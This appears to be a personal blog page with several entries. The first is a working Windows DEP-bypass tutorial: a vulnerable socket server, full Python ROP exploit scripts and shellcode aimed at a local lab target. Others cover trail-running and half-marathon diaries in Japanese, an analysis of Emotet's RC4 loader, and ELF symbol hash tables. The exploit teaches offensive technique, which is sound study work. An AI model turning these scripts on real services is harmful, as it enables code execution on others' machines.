2024-04-07

ROP on Kernel32.dll

binary windows

DEP Bypass by VirtualProtect

I re-visisted this topic and found the bypass is much easier than I have thought.

A case where `VirtualProtect` is present

Assuming we have a piece of x86-32bit code which calls VirtualProtect on a program with a buffer overflow vulnerability compiled with DEP, you can execute code if you know fix stack and code address.

/* bof.c */
#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")

void somewhere()
{
    char buf[1024];
    DWORD oldprotect;
    VirtualProtect(buf, sizeof(buf), PAGE_EXECUTE_READWRITE, &oldprotect);
}

void bof(SOCKET c)
{
    char buf[400];
    printf("[+] buf = %p\n", buf);
    recv(c, buf, 1024, 0);
}

int main()
{
    WSADATA wsaData;
    SOCKET s, c;
    SOCKADDR_IN name;
    BOOL yes = 1;

    WSAStartup(MAKEWORD(2, 2), &wsaData);

    s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (const char *)&yes, sizeof(yes));

    name.sin_family = AF_INET;
    name.sin_addr.s_addr = INADDR_ANY;
    name.sin_port = htons(4444);

    bind(s, (SOCKADDR *)&name, sizeof(name));
    listen(s, 5);
    puts("[+] listening on 0.0.0.0 port 4444");

    c = accept(s, NULL, NULL);
    closesocket(s);
    puts("[+] connection accepted");

    bof(c);

    closesocket(c);

    ExitProcess(0);
}

This code was borrowed from https://inaz2.hatenablog.com/entry/2015/07/11/211226.

Without compiler optimization and dead code elimination by Microsoft VIsual Studio Compiler, you will see the assembly of a function somewhere.

.text:00401250 ; =============== S U B R O U T I N E =======================================
.text:00401250
.text:00401250 ; Attributes: bp-based frame
.text:00401250
.text:00401250 ; void __cdecl somewhere()
.text:00401250 ?somewhere@@YAXXZ proc near
.text:00401250
.text:00401250 buf             = byte ptr -404h
.text:00401250 oldprotect      = dword ptr -4
.text:00401250
.text:00401250                 push    ebp
.text:00401251                 mov     ebp, esp
.text:00401253                 sub     esp, 404h
.text:00401259                 lea     eax, [ebp+oldprotect]
.text:0040125C                 push    eax             ; lpflOldProtect
.text:0040125D                 push    40h ; '@'       ; flNewProtect
.text:0040125F                 push    400h            ; dwSize
.text:00401264                 lea     ecx, [ebp+buf]
.text:0040126A                 push    ecx             ; lpAddress
.text:0040126B                 call    ds:__imp__VirtualProtect@16 ; VirtualProtect(x,x,x,x)
.text:00401271                 mov     esp, ebp
.text:00401273                 pop     ebp
.text:00401274                 retn
.text:00401274 ?somewhere@@YAXXZ endp

The function somewhere does not take any arguments and all arguments on VirtualProtect are pre-fixed. But, you can call the function from just before call on 0x0040126b with your arguments.

As a prerequisite, you need to gather the below information.

head of stack address on somewhere function
where the address of caller main is put
where is the address of the function which calls VirtualProtect, namely somewhere
address of pop_ebp_ret

import socket
import struct

# Execute Calc
shellcode = b'\xFC\xEB\x65\x60\x33\xC0\x64\x8B\x40\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x89\x44\x24\x1C\x8B\x68\x10\x8B\x45\x3C\x8B\x54\x28\x78\x03\xD5\x8B\x4A\x18\x8B\x5A\x20\x03\xDD\xE3\x37\x49\x8B\x34\x8B\x03\xF5\x33\xFF\xAC\x84\xC0\x74\x07\xC1\xCF\x0D\x03\xF8\xEB\xF4\x3B\x7C\x24\x24\x75\xE4\x8B\x5A\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5A\x1C\x03\xDD\x8B\x04\x8B\x03\xC5\x89\x44\x24\x1C\x61\x59\x5A\x51\xFF\xE0\x8B\x74\x24\x1C\xEB\xA8\x33\xC0\x50\x68\x63\x61\x6C\x63\x8B\xC4\x6A\x01\x50\x68\x98\xFE\x8A\x0E\xE8\x84\xFF\xFF\xFF\x50\x68\x7E\xD8\xE2\x73\xE8\x79\xFF\xFF\xFF'


def __do_pwn():

    shellcode_head = stack_head = 0x0019FBCC
    bufsize = 400
    # prepare shellcode on the buffer
    buf = shellcode
    # fill blank before reaching the return address
    buf += b'A' * (bufsize - len(shellcode))
    buf += b'AAAA'
    # you can find this on tails of most functions.
    pop_ebp_ret = 0x401273
    buf += struct.pack('<I', pop_ebp_ret)
    # the value of ebp will be copied to esp where you want to pivot off after coming back from VirtualProtect. 432 is the continuation address of the stack where PAGE_EXECUTION must be enabled.
    ebp = stack_head + 432
    buf += struct.pack('<I', ebp)
    # Address of call VirtualProtect
    virtual_protect_call = 0x0040126b
    buf += struct.pack('<I', virtual_protect_call)
    # 1st argument (pointer of the head of the target address)
    buf += struct.pack('<I', shellcode_head)
    # 2nd argument (size of the target page)
    buf += struct.pack('<I', 1024)
    # 3rd argument (flNewProtect = PAGE_EXECUTE_READWRITE)
    buf += struct.pack('<I', 0x40)
    # 4th argument (pointer of oldprotect which could be anywhere if it is valid and could be overwritten)
    buf += struct.pack('<I', stack_head + len(shellcode))
    # You want to set ebp which are supposed to be copied to esp at this stack address.
    # print(len(buf))
    # you need to add 4byte for "pop ebp" after "mov esp,ebp"
    buf += struct.pack('<I', 0)
    # Now you can execute codes on stack.
    buf += struct.pack('<I', shellcode_head)

    c = socket.create_connection(('127.0.0.1', 4444))
    c.sendall(buf)
    c.close()

__do_pwn()

After coming back from somewhere, mov esp, ebp will forget the position which was on the buffer of this stack. This is a good opportunity to get stack pivoted off, but in this case simply let it goes back to the original stack where shellcode waits. Before VirtualProtect is called, this buffer was non executable, but no longer later on.

A case where `VirtualProtect` is not present

You can also call VirtualProtect stub on Kernel32.dll assuming you know the base address of Kernel32.dll.

Kernel32.dll has one stub which jumps on VirtualProtect.

Note that offset must be different up to the version of Kernel32.dll. You can verify the offset with rp++

We do not need to take the subsequent codes into consideration because this stub uses jmp not call. It just comes back after the continuation point of the ROP chain.

def __rop_on_kernel32():
    stack_head = shellcode_head = 0x0019FBCC
    # 0x773A0000 is base address of Kernel32.dll
    # 0x20766 is the offset of stub of VirtualProtect
    virtualprotect_on_k32 = 0x773A0000 + 0x20766
    bufsize = 400

    buf = shellcode
    buf += b'A' * (bufsize - len(shellcode))
    buf += b'AAAA'
    buf += struct.pack('<I', virtualprotect_on_k32)
    # comes back to this after jmp
    buf += struct.pack('<I', stack_head)
    # Argument of VirtualProtect
    buf += struct.pack('<I', stack_head)
    buf += struct.pack('<I', 1024)
    buf += struct.pack('<I', 0x40)
    buf += struct.pack('<I', stack_head + len(shellcode))

    c = socket.create_connection(('127.0.0.1', 4444))
    c.sendall(buf)
    c.close()

__rop_on_kernel32()

I do not know direct jump on the stub on Kernel32.dll is well known, but at least found it useful as I discovered. There might be stubs on other DLLs which allows similar DEP evasion.

2024-03-17

高尾マンモストレイル (2024/03/16)

outdoor

挑戦してきました。

高尾マンモストレイルとは、高尾山口駅起点の全長45km位のトレッキングコース。登山客が多い高尾山周辺で、適度に空いているトレイルを楽しめます。ルートは北高尾から入って、堂所山、陣場山、藤野駅方面まで一旦降りた後、再び明王峠に向けて登り、景信山、小仏城山、その後、垂水峠から南高尾に入り、最後高尾山口駅に戻ってくるというルート。細かいルートは、今回のトレイルをヤマレコに記録したので、その地図を見るとわかりやすいです。

www.yamareco.com

実は、このルートは、トライするのは今回が初ではなくて3回目。

1回目 (2023/5)

1回目は昨年(2023年)の5月頃。この時は、あまり準備もせず北高尾に入り、堂所山まで辿り付けるかという疲労具合でした。高尾山駅を9:30頃に出たのですが、まず、北高尾の山道に入る入り口が分からず、相当迷った挙げ句、愛宕地蔵尊登山口の分岐で何も考えず左に進んでしまい、ジャングルのような森の中をクモの巣塗れになりながら15分近く進みました。振り返って戻ろうとした時には既に後ろに道はなく、開始早々、軽く遭難するという事態になりました。やっと、元の分岐から本来のルートに戻ったのですが、北高尾の延々と続く上りで、上り用の筋肉が疲労を起こし、堂所山までxkmという標識を見る度に、距離が全然縮まらない、と溜息を着くという具合でした。おまけに水分もほとんどなく、堂所山に着いたのが12:38分、そこから少し行った所で、景信山方面に折り返す以外選択肢はありませんでした。というか堂所山が遠すぎて辿り着けたこと自体の安堵感だけで満足しました。景信山まで登った所で、小仏峠方面と、小仏バス停方面を間違い、小仏バス停まで降りてしまい、最終的には、空いている国道516号線を歩いたり走ったりして高尾駅まで帰りました。国道516号線は、小仏峠で行き止まりなので、いつも空いているのですね。

この時は、自分が高尾マンモストレイルを全て制覇するのは絶対無理だと感じました。一方で、緩い下りのランの時に感じた爽快感・開放感がとても気持ちよく、この時の気分が次の挑戦に繋がりました。

2回目 (2023/6)

2回目は昨年(2023年)の6月頃。この時は、朝7:18分頃に高尾山駅から出発し、堂所山への到着が10:03。そのまま、明王峠(10:35)から陣馬山へ、ここで間違って下山ルートに入ってしまって、陣馬山に11:03に到着。そこから藤野まで下山し、この日は25度位の気温でしたが、とにかく暑く、川で手や顔を洗いました。ここら辺に来たこと自体初めてで、ルートから何度も外れかけましたが、最終的に12:30頃に明王峠へ向かう山道に入りました。ただ、ここから、虎杖沢の頭までの急な上りでかなり消耗しました。さらに、その後、走れる平坦な山道も歩き続け、明王峠へ向かう急な階段で、栄養不足、汗のかき過ぎで頭がクラクラになり、このままいくと倒れるのではないかという程でした。急な階段の手摺りに腰掛けて目眩が治るまで収まり、何とか明王峠に到着しました(14:30)。この後、他の登山客のペースで、15:17に景信山に到着、調子は少し持ち直したものの、小仏城山に到着したのは、16時過ぎ、体力的にも時間的にも、南高尾に向かうのは無理なので、高尾山経由で下山しました。

コース離脱してしまった反省として、栄養不足と気温が高すぎたことによる汗のかき過ぎ、それに中盤以降の上りでの体力の無さがあったかと思います。とりあえず、これ以上暑い時や体力が向上するまで登っても上手く行かないと思い、すぐに再挑戦しませんでした。

3回目 (2024/3)

出発〜陣馬山

昨日(2024年3月16日)、トライしました。朝5時起き、栄養不足にならないように、前日に炊いておいたご飯、うどん、ハム卵を挟んだトースト2枚を食べて、6時過ぎに家を出ました。高尾駅到着は、前回とほぼ同じで、身体を軽くするためトイレに行き、出発は、7:22頃。これ以上早くは出れません。北高尾に入って、想定以上に暑いことに気付きました。上下ともアンダーアーマーの長袖コンプレッションウェア、さらに、ウィンドシェルを着てたのですが、早々に、上半身は、Tシャツに変更。3回目だというのに杉沢ノ頭の分岐で道を間違えたものの、ヤマレコの通知機能で10分以内のロスに留まりました。堂所山到着は、10時ほぼぴったりで、前回よりも少し早い程度。タイムは変わらないけれど、上りの体力的には、圧倒的に前回より余裕があります。陣馬山到着は10:43。休息は取らず、明王峠(10:18)、陣馬山(10:43)。この時点で、前回より20分速い。エイドと水分は今回大量に持ってきており、陣馬山で補給。どら焼き1個とバナナ1本平らげ、ソフトフラスクにDAKARAとアクエリアスを充填します。ちなみに今日は平日なので、トイレが大渋滞になる程、人でごった返してます。ヤマレコの記録によるとここで25分位休息してたそうです(そんなにしてないはず...)。

陣馬山〜明王峠

ここから一ノ尾根を下るものの、下りのスキル不足、着地する際の筋肉痛、4lの水分の重みを含むザックの肩まわりの長さ調節ができてないことによる振動から来る肩、腰の痛みで、流れるように前に進むという感じではありません。速い人はここで圧倒的に距離を稼ぐのか、と思いつつ、ブレーキを掛けながら走り続け、陣馬山登山口で、11:52。ロードを走っている際に、12時のチャイムを聞きます(今日学校あった?)。大沢ノ頭入口で気合いを入れ直し、再び登山道へ。大沢ノ頭まで半分程登った所で、前回来たにも関わらず、進む道が不明な部分があり、とっさに、若干下り貴重の左を選択。最終的に凄い細い崖道になりヤマレコからの警告で引き返したのですが、この極端な上りでの進路選択ミスは痛い。この上り基調で少しでも下りが出てきたらおかしいですよね。。というか上り続ける道を選ばなくてはだめ。山道に入ってから虎杖沢ノ頭まで30分ちょっとでした。前回はここで寝込んだのですが、今回は、5秒で立ち上がり、前へ進みます。奈良本峠から少し行った分岐で、久しぶりに遭遇した登山客に挨拶をする代わりに標識をよく読まず、奈良本方面に、また入ってしまう。また、ヤマレコの警告で引き返し、走りやすい傾斜を走ったり止まったりしながら、明王峠までの最後の階段も何とかクリアし、明王峠に13:22に到着。まだ、栄養不足にはなっていないものの、バナナ1本とジェルを補給し、先を急ぎます。

明王峠〜城山

明王峠から景信山辺りは登山客も最も多い山道なのですが、決して走れない程混雑していないにも関わらず、走れる勾配も気力が上がらず、トロトロ進みます。かなり速いテンポで走るランナーにも結構抜かれ、この位のペースでないと、7、8時間でマンモス周れないのだろうな、と力量の差を感じ更に気力が落ちます。景信山に着いたのが14:14、実は前回より1時間早いだけということがわかり、走れる箇所を走っていないからだなと思いながら、ドンキで買った58円の大福を食べます。景信山の小仏バス停方面にあるトイレにも行き、誤って、その方面にある方向に走り始めてしまい、こんなに道に間違ってしまっていたら、今回も完走は難しいな、と更に気落ちします。城山に到着したのが、15:07。この先の五十丁峠で、南高尾方面に入るか決意しなければいけません。暗闇の中をライトで進むというランはしたくないと思っていたので、ヘッドライトも持っていなかったのですが、一方で、またエスケープルートにも入りたくもない、この時期の日の入りの時刻もよくわかっていない、そんな状況でしたが、分岐に入って特に止まるって考えるのも嫌だったので、大垂水方面に入ってしまいました。背に腹は変えられません。

城山〜高尾駅

大垂水峠方面に入って、ここからの山道は初めてだったのですが、あまりに人が少なく不安になりました。また、どの位走れる傾斜があるかというのが気になっていたのですが、大垂水峠までの降下は、かなり急で、かつ、この峠で最終的に国道20号線に一旦出ることも知りませんでした。大垂水峠は、中央本線と交わる小仏峠と違って、国道20号はトンネルではないんですね。国道20号線に出て、本来は、すぐの歩道橋で20号を渡るのが正解なのですが、予備知識もないので、とりあえず、国道20号線を東に走ります。ただ走れる歩道もほとんど無いし、これはおかしいと思い、ヤマレコの警告が出る前に引き返しました。歩道橋方面には、「梅の木平」方面と書かれていますが、ここの地形をGoogle Mapで検索しても何も出てきません。というか、ここの場所で、電波が入りません。とりあえず、国道を走るか、ほとんどこないバスを待ちながら、リタイアという苦渋を舐めるより、こちらの道に賭ける方が健全だと思い、歩道橋を渡ります。しばらく進み、ヤマレコからの警告が来ないことを励みに走り出します。この時点で、既に15時45分頃になっていました。そして、太陽の位置が気になります。まだ、沈みそうという程では無いものの、太陽の位置からどうやら現在の進路は東ではなく南に向かっているということで、高尾山口まで相当距離があるように見えます。とにかく走れる所を走り続けました。15:54に大洞山まで来て、進路が正しく来ているということは分かったものの、相変わらず、標識は「梅の木平までxkm」という形で、「梅の木平」どこや、と叫びながら、日没までにできるだけ進みたいと時折現れる標識を確認しつつ走り続けます。途中で、三沢峠方面という標識が出てきて、こちらはヤマレコのマップにあったので、少し安心しましたが、正直、この時は、ある段階で暗闇の山道を進むことを覚悟していました。太陽が沈む中、三沢峠までとにかく走り、峠に着いたのが16:35、ヤマレコを見てみると、何とかなりの距離きていることがわかりました。これなら、何とか日没までに間に合うのか。。おそらく、大洞山からの4km位を1km/10分位で来ていたと思います。ロードだと相当遅いですが、山道では自分としては大健闘。草戸山まで来ると、少し安堵感とこれまでの疲れから、ほとんど走れなくなってきました。ただ、意外と太陽が山に隠れた後も、辺りはよく見えるものですね。ローペースで、四辻まで来て、ここまでこれば恐らく大丈夫。ロードに出たのは、17時39分頃でした。この後、高尾山口駅、さらには、今回の起点の高尾駅に、走ったり歩いたりしながら到達しました。高尾到達時(18:08)は真っ暗ではなかったですが、風がかなり強く身体も急に冷えてきました。

感想

今回は、タイムというより、目標は、日没までに無事にコースを完走することだったので、目標を達成できて良かったです。感覚的ですが、全体的に走ったのは２割程度位でしょうか。この割合をもっと上げていけばタイムは縮まりそうです。その他、改善点としては、かなり水分やエイドが余ったことと、ライトを持って来なかったこと、5回位本来のルートから外れたこと、早々に下りで筋肉痛になったことなどがあります。これらを改善すれば、1時間位は速く回れそうです。一方で、トレランを趣味にするには、相当厳しいな、というのが終えた正直な感想です。

今回のラン前の身体の状態としては、ロードでは直近1ヶ月で350km位は走っており、心肺機能や持久力は十分に整っている状態でした。一方、山道のような勾配はほとんど走っていなかったので、どうなるかと思いましたが、結果、遅筋に使う上りはロードでのランである程度鍛えられていたものの、下りで使う速筋がすぐに筋肉痛になってしまいました。私は、若い頃は、持久型というよりスプリント型だったのですが、長距離を走り始めてから、遅筋が鍛えられたこと以上に、速筋が衰えてしまっているように思えます。これが歳の原因か遅筋が鍛えられたからかはわかりません。ただ、下りに使う速筋が、ロードでの平地ランで鍛えられないとすると、少なくとも毎月位山に来て鍛えなければいけませんが、そこまでの頻度では来れません。今回、筋肉痛になっている筋肉は、習慣的に山でトレーニングすれば解消される気はするけど、そこまでしてタイムを上げるモチベーションもありません。

また、別の理由もあります。急勾配を走って登るランナーや、自分が走れないと思う勾配をテンポ良く下るランナーとすれ違うと、これを練習で身に着けるには、頻繁に山に来ることと、ある種の才能も必要なのでは無いかと感じてしまいます。特に下りに関しては、筋力だけでなく、恐怖心や怪我を減らすための足取りの技術も必要になると感じました。さらに、今回は無事下山しましたが、途中下りで転びそうに何回かなりましたし、時間的な制約で下山できないリスクなども考えると、趣味として気軽に楽しめるものでもありません。

ただ、そうは言っても山を走るのは楽しいですね。また、気分転換にフラット行きたいものです。

2024-03-02

昭和記念公園ハーフマラソン (2024/03/02)

outdoor

初ハーフマラソンでした。次にすぐ走る予定もないので、記憶がフレッシュな内に備忘録として書いておきます。

準備

ハーフマラソンに出ようと思い立ったのは大会1ヶ月前位だったですが、それまでに、ランニングの習慣は形成されてました。

ランニングを始めた主な理由は、30代になり明らかに運動していないと体力が落ちていると感じたことが大きいと思います。在宅勤務で何年か座って仕事をしていて、時々立ち上がるとそれだけで立ち眩みがするようになり、このまま体力が落ちていくとどうなってしまうんだという不安がありました。当時は体重も50kgを切っており、食事も1日2回で、かなりの虚弱体質でした。その割に、姿勢の悪さからかお腹回りには結構脂肪はある状況でした。

ランニングを始めてみると、体力の向上以上によいことがありました。思えば、20代のほとんど、高校卒業から10年以上習慣的に運動をやっておらず、いつのまにか、仕事はさておき、日常生活で自分の限界に挑戦するというマインドが廃れていたようでした。走り始めて、そのマインドを再び取り戻せたように思います。

始めたのは、2022年の前半のどこかからで、1km位から始めて、徐々に増やしていき、この年は大体毎朝3-5km位走るのが習慣になりました。2023年の1月にもう少し長い距離を走ろうと思い、13km位を土日に続けて走った所、2週目で右足の半月板がおかしくなり、その後、2ヶ月位走れない時期が続きました。回復してからは、毎朝走りこむ距離を7kmに増やし、夏シーズンも休まず走り続けました。

2024年1月位に、ふとしたきっかけでこのタイミングで、大会に出てみるのもよいのではないかと思い、色々な大会を調べ始めました。一方で、土曜に13km、日曜日18km走った所、7km走る速度とほぼ同じ速度で走りきることができました。翌週も同じ距離を走った上で、これならハーフマラソンなら行けると思い、3/2の昭和記念公園で行われるランニングフェスタに申し込みました。申し込み時は既に大会まで1ヶ月を切っていました。

当日

この大会は昭和記念公園の開園が9:30からということもあり、他の大会のように9:00から開始という種目はなく、ハーフマラソンも11:00からでした。朝何かと遅れることが多い私にとっては、これは助かりました。最高気温は10度、最低気温は4度と走るには良い天候でしたが、朝駅のホームで、かなり強い西風が吹いていて、この風が向かい風なら走るのはキツくなりそうだと感じました。

ちょっとコースを歩いてみたかったので、昭和記念公園には、立川駅から歩いて、下の写真にある立川口から入りました。

思えば、昭和記念公園は高校生の時に一度来た他には小学生の時に何回か来ただけで、ほとんど夢の中の記憶と混在している程忘却していましたが、この立川口に来たのは間違いなく初めてでした。そこから15分ほど歩いてマラソン受付に行き、引換証と交換にゼッケンをもらいました。近くに更衣室があり、流れに任せて行ってみると、既に大混雑で、皆さん若いランナーがかなり多いように感じました。大学生だけでなく高校生も結構いるようでした。そういえば、高校の時に、冬だけ短距離の陸上の練習に仮入していたのですが、ここで5kmを走らせられて地獄を見たことを思い出しました。。

わずかに空いていたロッカーに荷物を預け、硬貨が戻ってくる出口があったので、100円玉を入れて鍵を閉めて、鍵をもう一度開けて100円玉が戻ってくるか確認した所、戻ってきません。しょうがないので、もう一度、100円玉を投入し鍵を閉めて更衣室を出て階段を登ってゼッケンを取り付けようとした所、今度は、受付でもらったゼッケンを取り付ける安全ピンがありません。ロッカーまでの間に落としたかと思い、人が多い中、ウロウロ探した結果無かったので、またロッカーを開けて、新しい100円玉を投入するか迷ったのですが、結局、受付で新しい安全ピンをもらいました。

無事安全ピンを手に入れてから、競技の起点となるスタート地点に向かいました。

この時点で開始20分前位だったのですが、その間は、ゼッケンを付けたり、ジェルを飲んだり、トイレに行ったり、軽く走ったりして、過ごしました。気が付くと、スタート地点に選手が集まっていることに気付き、行ってみると、ハーフに出場する人々でした。持ちタイムの速い順に前から詰める形のようでしたが、今回は、1時間45分前の標識は無かったように思えます。更衣室にいた速そうな若い人は、もっと短い距離や30kmに出場していたのかもしれません。私は、目安としては1:45、できたら1:40位行きたいと漠然と思っていたので、1:45のペースメーカーのすぐ後ろで号砲を待ちました。

号砲が鳴り開始すると、意外と1:45がゆっくりめなので、少し前に出て1:40のペーサーに付きました。ただ、それも少しゆっくりめなので、最初の1:095kmの間で1:40のペーサーより前に出ました。その前の1:35のペーサーは全く見えず、同じくらいのペースの人と6、8人位で群を成して進みました。

1つ気付いたのが、私は山登りなどは得意ではないので、自分では登り坂に苦手意識があり逆に下りは得意という意識がありましたが、私以上に登り坂でペースダウンしている人が多く、登り坂で私が抜かして、下り坂で抜かされるということが度々ありました。日頃のランニングコースに立川段丘が入っているので、知らず知らずの内に鍛えられたのかもしれません。

最初の1周(5km + 1.095km)が終わり、調子が良かったので集団の前に出ました。風がある時は集団にいた方が風除けになりますが、1周走った中では、風は大した影響はないように感じました。この日は確かに強風でしたが、このコースは公園内にあるため木が生い茂っており風を吸収してくれるため、シティマラソンなどと比べて風の影響は受けにくいのかもしれません。2週目の前半は落ちてくる前のランナーを数人抜かしながら1:35のペースメーカーに追いつくことを期待して走りました。思えば、ここがこのレースでの私の絶頂期でした。2週目のラストに来て、体の内臓の痛みも少し出てきており、左太腿の付け根も痛み出したため、ペースを落とすことにしました。1週目の集団にいた何人かに抜かれ、どんどん差が離れていきました。2周目がとにかく長く感じました。

2周終わった段階で、3周目はとにかくローペースで走り切り、4周目に余力を残すことにしました。練習では、同距離は少なくとも5分/kmで走っていたので、そのペースで走るだけの自信はありました。結果的に、3、4周目ともローペースになったものの、5分/kmまで落とすことはなく走り切りました。最後は、スパートを掛けていた1:40のペーサーにも抜かれ、ペーサーなのにスパートを掛けるのは卑怯だと思いました。ただ、終わってみると、1:40よりは早く、どうやら、そのペーサーは、周りの1:40付近のランナーを引っ張るためにスパートしていたようでした。

結果

結果だけみると、1:40を切れたので大満足でした。練習では、大体、5分位/1kmで走ることが多いので、4分40秒ペースで走れたのは大きな収穫でした。ただし、ラップだけみると、1、2周目と3、4周目の差が大きく、やはり10km以上の練習やより速いペースでの練習を日頃からしていないと、ペースダウンしてしまうことがわかったことは今後の練習の参考になりそうです。

2020-09-22

emotetのRC4

binary crypto

emotet loaderのRC4

最近emotetがまた流行っているらしいので、昨年流行したemotet(解析したのは今年の初め)との違いを見てみる

今回はLoader周りの記述のみ簡単に解説

前回を簡単におさらいすると、

外側のPEから.dataセクションに存在したPE loaderとPEが同一領域に確保される(base64で変換)
PE loader内の処理で、起動されるPEが再度別領域に確保される
PEが実行される

今回は、何やら

外側のPEがLoaderの前に、.dataセクションに存在したPre-loader(後述)をheap上に確保する(単純なadd/sub演算による変換)
Pre-loaderがPE loaderとPEを同一領域に確保する
PE loader内の処理で、起動されるPEが再度別領域に確保される
PEが実行される

という感じになっている

2のPre-Loaderがやや技巧的になっていて詳細には、

RtllFindResource_U/RtlAccessResource/VirtualAllocateのアドレスを解決する
.rsrcセクションに存在する特定のエントリの領域分を確保する
2をRC4(*)で復号(PE loader+PEを生成)する

RC4の実装について、見てみる

f:id:vrodxda:20200922143436p:plain — emotet-RC4-01

f:id:vrodxda:20200922143521p:plain — emotet-RC4-02

f:id:vrodxda:20200922143541p:plain — emotet-RC4-03

これらのスクリーンショットは、実行時にヒープに確保された0x800程あるPre-loaderの最後の領域に存在しているRc4の実装である

一番下の図 emotet-RC4-03 から見ていく
多くの共通鍵暗号に当てはまるが、0x7e4のxor(*1)に注目する
xor edx,ecx
edxが更新されるので、

1. edxが取得されたメモリ(スタック)に暗号化されたデータ(今回の場合はリソースセクションから参照された領域)が存在する  
2. edxが格納されるメモリ(スタック)に復号されたデータ(今回の場合、事前に確保されたPE loader + PE )が存在する  
3. ecxが取得されたメモリ(スタック)に鍵から生成された疑似乱数が存在する

ことが推察される

スタックに確保されたメモリはそれぞれローカル変数、または引数を指していると思われるが、それらを1,2,3から明らかにする 1.2からは簡単にわかる

スタック変数
[ebp -18] : 現在のストリームのインデックス
引数
[ebp + 8] : 暗号化データのベースアドレス [ebp +18] : 復号データの格納先のベースアドレス

3(どのように鍵が生成されているか)を読み解く

中々読み解いていくことが難しい

そこで上のアセンブリを以下の様に、メモリに「ストア」した段階で、1つ前に現れた「ストア」移行の命令と共に、ボックスに囲ってみる

f:id:vrodxda:20200923095453p:plain

スタック変数

[ebp -1c] : 疑似乱数を一時的に格納している領域

~7bb | add ecx eaxの生成元を辿っていくと、

[ebp - 14 - 11c] : 疑似乱数の生成元1(addされるデータの1つが格納される)
[ebp - 8 - 11c] : 疑似乱数の生成元2(addされるデータの1つが格納される)
[ebp -1] : 内部パラメータ(swap処理の為に一時的に使われる)

それぞれの関係を見ていくと、

[ebp - 14 - 11c] <= [ebp -1] <= 5
[ebp - 8 - 11c] <= [ebp - 14] <= 6
[ebp - 1] <= [ebp - 8 - 11c] <= 4

これはスワップ

[ebp - 14] : 1ずつincrement <= 2
[ebp - 8] : [ebp - 14 - 11c] + 1 <= 3

まとめると、

i, j = 0, 0
loop:
        i = (i + 1) % 256 # <= 2
        j = (j + S[i]) % 256  # <= 3
        S[i], S[j] = S[j], S[i]  # <= 4,5,6
        K = S[(S[i] + S[j]) % 256] # <= 7

RC4のPRGAの処理をしていたことが分かる

emotet-RC4-01 に関しては、
1. 「昇順で値が並ぶ配列」
2. 下記の「K」に相当する値の一時的な配列

emotet-RC4-02 に関しては、
3. 先の1,2で生成された値を状態の1つ(下記変数「j」)に足し合わせ
4. 1で生成された配列の「i」番目の要素と、3で更新された「j」番目の要素をスワップ

といった動作を行っている

S = range(256) # <= 1
j = 0
for i in xrange(256):
        k = ord(key[i % len(key)]) # <= 2
        j = (j + S[i] + k) % 256 # <= 3
        S[i], S[j] = S[j], S[i] # <= 4

なお、この場合、鍵は.dataセクション内の、このペイロード自体が存在した直前に置かれ、ペイロードの引数として参照されるようだ

このアセンブリ(一般的なアセンブリにも当てはまるかももしれない)を分析する場合以下の点が難しい

メモリのロードにSIBを用いたインデックスを使う場合
配列アクセスの場合だが、この時、SIBのレジスタがロードされた領域が別の命令によって、ロードされているので、配列のアクセスの際にどこを参照しているのか直観的に分かりにくい
意味のある単位に分割しずらい
- これは慣れの問題もあるかもしれないが、通常、「ロード => 処理 => ストア」という単位で、「ストア」をした場合、一度、アセンブリの意味の単位が切れるという認識がある
- これは単純に分析の為の表現という問題だが、「774 - 7cd」辺りを見て、意味のある単位の計算が何個行われているのかぱっと見て分かりずらい(実際にこの領域にストアは5つある)

補足

*1 xorが使われている場合の暗号化パターン

xorの使い方次第で、暗号化アルゴリズムの推測が可能である

メモリの値をロードして、xorの結果を直接ロードするパターン
e.g. xor [eax],ebx
mod == 0x00,0x01,0x10の場合である
この場合、値は上書きされるので、暗号化される前の値を後で使用したりする計算を行う可能性は低い(事前に別途コピーしていなければ)
1byteのみ書き換えを行うパターン
e.g. xor al,bl
opcodeが0x30,0x32の場合である
1byteずつ暗号化するということストリーム暗号である可能性が高い最もこのRC4のケースの様に、1byteずつの演算だが、レジスタのサイズが4byteで計算している場合等はある
16byte以上のxor演算を行う場合
e.g. pxor xmm1,xmm2
16byte単位(128bit)や32byte(256bit)単位でxor演算を行う暗号化処理である(例えば、DESや、自前で実装したAESなど)
即値(immediate value)を用いる場合
e.g. xor eax,12345
opcode = 0x83の場合
滅多にないかもしれないが、unpack処理等で鍵を固定値にしている場合等はあり得る

その他

PE loader(/=Pre-Loader)自体は、 malware_analysis/emotet_loader.asm at master · Hiroshi123/malware_analysis · GitHub にある
ここら辺Ghidra等既存のdecompilerを使えばよいと思われるが、ヒープ確保領域での実行など静的に解析に難しい場合など、自分で解析する目を訓練したい所ではある

2020-05-09

DT_HASH and DT_GNU_HASH preparation by linker

linker

Example of linker development reflecting loader implementation

Here, I will show you how to prepare codes to resolve API dynamically on linker through reading elf loader codes(musl libc :: ldso/dynlink.c).

On elf format, either of two API hash tables needs to be prepared to provide export symbols as a shared library to other demanding libraries or executables.

Simpler one is called DT_HASH and daily-used, rather sophisticated one is DT_GNU_HASH.

Both shares a basic role. It is to minimise the computational cost of calling strcmp when resolving own export symbols.

When an import symbol comes, 32bit hash is calculated in its own way, and if the hash is in the hash table, it provides dynamic symbol table index.

DT_HASH function is

static uint32_t sysv_hash(const char *s0)
{
    const unsigned char *s = (void *)s0;
    uint_fast32_t h = 0;
    while (*s) {
        h = 16*h + *s++;
        h ^= h>>24 & 0xf0;
    }
    return h & 0xfffffff;
}

GNU_HASH function is

static uint32_t gnu_hash(const char *s0)
{
    const unsigned char *s = (void *)s0;
    uint_fast32_t h = 5381;
    for (; *s; s++)
        h += h*32 + *s;
    return h;
}

DT_HASH

typedef struct /*dt_hash_table */{
  uint32_t nbucket;
  uint32_t nchain;
  // it depends on above 2.
  uint32_t bucket[nbucket];
  uint32_t chain[nchain];
} DtHashTable;

The computed hash is used for accessing hash table index, Starting thinking things naively, suppose you prepare 4byte array(assuming dynamic symbol table index is represented as 4byte) in a range of 32bit hash, you need 4byte times 2³² (Since every hash value store distinct values.), which is too much to allocate.

You cannot change hash function and the output bit range, but you can adjust the size of hash table by setting your own bucket size as modular of a hash value.

